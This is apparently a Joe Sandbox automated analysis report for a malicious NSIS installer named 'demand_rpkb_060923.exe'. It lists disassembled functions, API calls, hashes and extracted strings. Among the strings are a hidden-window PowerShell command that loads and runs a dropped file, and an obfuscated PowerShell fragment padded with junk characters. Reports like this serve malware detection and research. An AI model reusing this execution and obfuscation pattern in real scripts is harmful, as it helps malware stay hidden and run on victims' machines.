Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\demand_rpkb_060923.exe"$@TA$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\demand_rpkb_060923.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-2472909140
Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040618A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32 ref: 004062B5
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,00000400,?,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00405256,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000), ref: 004062C8
SHGetSpecialFolderLocation.SHELL32(00405256,745CEA30,?,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00405256,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000), ref: 00406304
SHGetPathFromIDListA.SHELL32(745CEA30,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam), ref: 00406312
CoTaskMemFree.OLE32(745CEA30), ref: 0040631E
lstrcatA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,?,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00405256,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00000000,00421715,745CEA30), ref: 00406394

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam, xrefs: 004061B4, 00406281, 00406282, 00406283, 0040629F, 004062B4, 004062C7, 004062E3, 0040630E, 00406341, 00406347, 0040635F, 00406372, 0040638D, 00406393, 0040639B, 004063C5
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040633C
Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder", xrefs: 004061AF
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406284

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam$Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder"$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-3428272171
Opcode ID: cdc54c544b64f6d83ca5da95277fa7ec9e25f9e07b413b0e0ec9f16d5b3b497f
Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
Opcode Fuzzy Hash: cdc54c544b64f6d83ca5da95277fa7ec9e25f9e07b413b0e0ec9f16d5b3b497f
Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00401759 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Arbejdsdatabasens Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104

Part of subcall function 0040521E: lstrlenA.KERNEL32(Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00421715,745CEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00421715,745CEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
Part of subcall function 0040521E: lstrcatA.KERNEL32(Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00403233,00403233,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00421715,745CEA30), ref: 0040527A
Part of subcall function 0040521E: SetWindowTextA.USER32(Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder"), ref: 0040528C
Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA

Strings

Software\Microsoft\Windows\Precommunion\Uninstall\Albizzias97\holly\halv\Kundenavnenes, xrefs: 00401826, 00401842
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam, xrefs: 00401775, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6, xrefs: 00401786

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam$Software\Microsoft\Windows\Precommunion\Uninstall\Albizzias97\holly\halv\Kundenavnenes
API String ID: 1941528284-1602410881
Opcode ID: 5509bd2040818d087d1bebcb726dff50be1ad66580b10ce54bc1622c5aeaffaf
Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
Opcode Fuzzy Hash: 5509bd2040818d087d1bebcb726dff50be1ad66580b10ce54bc1622c5aeaffaf
Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040521E Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00421715,745CEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
lstrlenA.KERNEL32(00403233,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00421715,745CEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
lstrcatA.KERNEL32(Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00403233,00403233,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00421715,745CEA30), ref: 0040527A
SetWindowTextA.USER32(Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder"), ref: 0040528C
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA

Strings

Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder", xrefs: 0040523E, 00405250, 00405256, 00405279, 00405285

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder"
API String ID: 2531174081-4148374931
Opcode ID: 5dba0e3b5696ece34bbdeba82eadf5b4d308cfd28b6f208a66e89dc32a1606df
Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
Opcode Fuzzy Hash: 5dba0e3b5696ece34bbdeba82eadf5b4d308cfd28b6f208a66e89dc32a1606df
Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004030D8 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040313F
GetTickCount.KERNEL32 ref: 004031E6
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 0040320F
wsprintfA.USER32 ref: 0040321F

Strings

... %d%%, xrefs: 00403219
dir;$Unhappiness = """Pr;PaFreuEkn RcfotKliSeoNun C CoB HaBusReespnAseRhsFusun0Ri4Ma Ba{Tr Pa Ep Un UpUnaCyrStalimCa(An[DaSPitLnrBliInnRegTr]Es`$PaTraa RcWyhRtyTrgGreUnnAle GsSkiDrs B)Su;Dr Aa Sp un Gr`$ CPNeaGetAnrKuiEllDoaJutbaeMerDiaqul B Br=Cl GeN SeBawBe, xrefs: 00403159

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$dir;$Unhappiness = """Pr;PaFreuEkn RcfotKliSeoNun C CoB HaBusReespnAseRhsFusun0Ri4Ma Ba{Tr Pa Ep Un UpUnaCyrStalimCa(An[DaSPitLnrBliInnRegTr]Es`$PaTraa RcWyhRtyTrgGreUnnAle GsSkiDrs B)Su;Dr Aa Sp un Gr`$ CPNeaGetAnrKuiEllDoaJutbaeMerDiaqul B Br=Cl GeN SeBawBe
API String ID: 551687249-3115735576
Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00406492 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32 ref: 004064A9
wsprintfA.USER32 ref: 004064E2
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6

Strings

\, xrefs: 004064BA
UXTHEME, xrefs: 0040649B
%s%s.dll, xrefs: 004064DC

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405CBF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405CD3
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405CC2
nsa, xrefs: 00405CCA
"C:\Users\user\Desktop\demand_rpkb_060923.exe", xrefs: 00405CBF

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\demand_rpkb_060923.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
API String ID: 1716503409-3597831194
Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758

Uniqueness

Uniqueness Score: -1.00%

Function 0040209D Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8

Part of subcall function 0040521E: lstrlenA.KERNEL32(Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00421715,745CEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00421715,745CEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
Part of subcall function 0040521E: lstrcatA.KERNEL32(Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00403233,00403233,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00421715,745CEA30), ref: 0040527A
Part of subcall function 0040521E: SetWindowTextA.USER32(Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder"), ref: 0040528C
Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 1874cd7ec561b218745ae5e512fc031f90a453e94b8642f8ca62c5d28347f57e
Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
Opcode Fuzzy Hash: 1874cd7ec561b218745ae5e512fc031f90a453e94b8642f8ca62c5d28347f57e
Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,745CFA90,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,745CFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B36
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 004056E4: CreateDirectoryA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405727

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
